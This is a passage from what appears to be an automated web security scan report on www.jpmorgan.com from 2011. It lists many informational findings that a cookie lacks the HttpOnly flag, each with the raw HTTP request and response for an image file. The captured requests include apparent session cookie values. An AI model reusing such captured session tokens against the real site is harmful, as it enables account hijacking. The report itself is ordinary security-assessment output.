Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:00 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:56:10 GMT
Accept-Ranges: bytes
Content-Length: 1482
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d.................................................................................................................................................
.T..
...[SNIP]...

11.252. http://www.jpmorgan.com/images/scnd_client_pixel.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_client_pixel.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_client_pixel.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:59 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:51:28 GMT
Accept-Ranges: bytes
Content-Length: 347
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

..................................................................
...[SNIP]...

11.253. http://www.jpmorgan.com/images/scnd_menu_tab.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_menu_tab.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_menu_tab.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:53 GMT
Server: Apache
Last-Modified: Thu, 31 Jul 2008 18:24:18 GMT
Accept-Ranges: bytes
Content-Length: 791
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d.................................................................................................................................................#....
...[SNIP]...

11.254. http://www.jpmorgan.com/images/scnd_menu_tab_left.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_menu_tab_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_menu_tab_left.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:58 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:51:28 GMT
Accept-Ranges: bytes
Content-Length: 362
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................#....
...[SNIP]...

11.255. http://www.jpmorgan.com/images/scnd_more_services_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_more_services_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_more_services_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:00 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:51:28 GMT
Accept-Ranges: bytes
Content-Length: 96
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......qpqDCCRRR......dcc...;::!.......,..........%x...0J(F...3...A.....c.d..eHx.5.)..|..;

11.256. http://www.jpmorgan.com/images/scnd_onstate_arrow.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_onstate_arrow.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_onstate_arrow.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:01 GMT
Server: Apache
Last-Modified: Wed, 23 Jul 2008 16:31:50 GMT
Accept-Ranges: bytes
Content-Length: 754
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....,.,.....C......................
.....
...
.................................C....... .. ..........................................................!...."..............................
...[SNIP]...

11.257. http://www.jpmorgan.com/images/scnd_tab_bar_pixel.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_tab_bar_pixel.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_tab_bar_pixel.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:58 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:51:28 GMT
Accept-Ranges: bytes
Content-Length: 333
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................!....
...[SNIP]...

11.258. http://www.jpmorgan.com/images/scnd_vert_dottedline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_vert_dottedline.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_vert_dottedline.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:59 GMT
Server: Apache
Last-Modified: Fri, 25 Jul 2008 20:52:36 GMT
Accept-Ranges: bytes
Content-Length: 87
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......ZZZ.........!.......,..........(.............|..~bH.f..j..n..rL.v....$C..;

11.259. http://www.jpmorgan.com/images/scnd_wht_bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/scnd_wht_bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/scnd_wht_bkg.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:59 GMT
Server: Apache
Last-Modified: Mon, 11 Aug 2008 16:11:51 GMT
Accept-Ranges: bytes
Content-Length: 65297
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Windows.2008:08:11 13:11:49.........
...[SNIP]...

11.260. http://www.jpmorgan.com/images/thrd_client_tab_left2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thrd_client_tab_left2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thrd_client_tab_left2.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:53 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2008 23:08:26 GMT
Accept-Ranges: bytes
Content-Length: 954
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d......................................................................................................................................................
...[SNIP]...

11.261. http://www.jpmorgan.com/images/thrd_client_tab_right2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thrd_client_tab_right2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thrd_client_tab_right2.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:53 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2008 23:08:26 GMT
Accept-Ranges: bytes
Content-Length: 939
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d......................................................................................................................................................
...[SNIP]...

11.262. http://www.jpmorgan.com/images/thrd_subnav_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thrd_subnav_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thrd_subnav_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:06 GMT
Server: Apache
Last-Modified: Mon, 21 Jul 2008 15:41:10 GMT
Accept-Ranges: bytes
Content-Length: 82
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.. ....eXR.........<,$QB;:)!...!.......,...... ....x.......1 ,{.>\...#<Pz$.;

11.263. http://www.jpmorgan.com/images/thrd_subnav_dottedline.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thrd_subnav_dottedline.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thrd_subnav_dottedline.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:05 GMT
Server: Apache
Last-Modified: Mon, 21 Jul 2008 15:41:10 GMT
Accept-Ranges: bytes
Content-Length: 469
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

..................................................................
...[SNIP]...

11.264. http://www.jpmorgan.com/images/thumb_am_62.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thumb_am_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_am_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:27 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:58:15 GMT
Accept-Ranges: bytes
Content-Length: 2805
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ..........................................................>.>.."..............................
...[SNIP]...

11.265. http://www.jpmorgan.com/images/thumb_cb_62.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thumb_cb_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_cb_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:28 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:58:57 GMT
Accept-Ranges: bytes
Content-Length: 2082
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ..........................................................>.>.."..............................
...[SNIP]...

11.266. http://www.jpmorgan.com/images/thumb_ib_62.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thumb_ib_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_ib_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
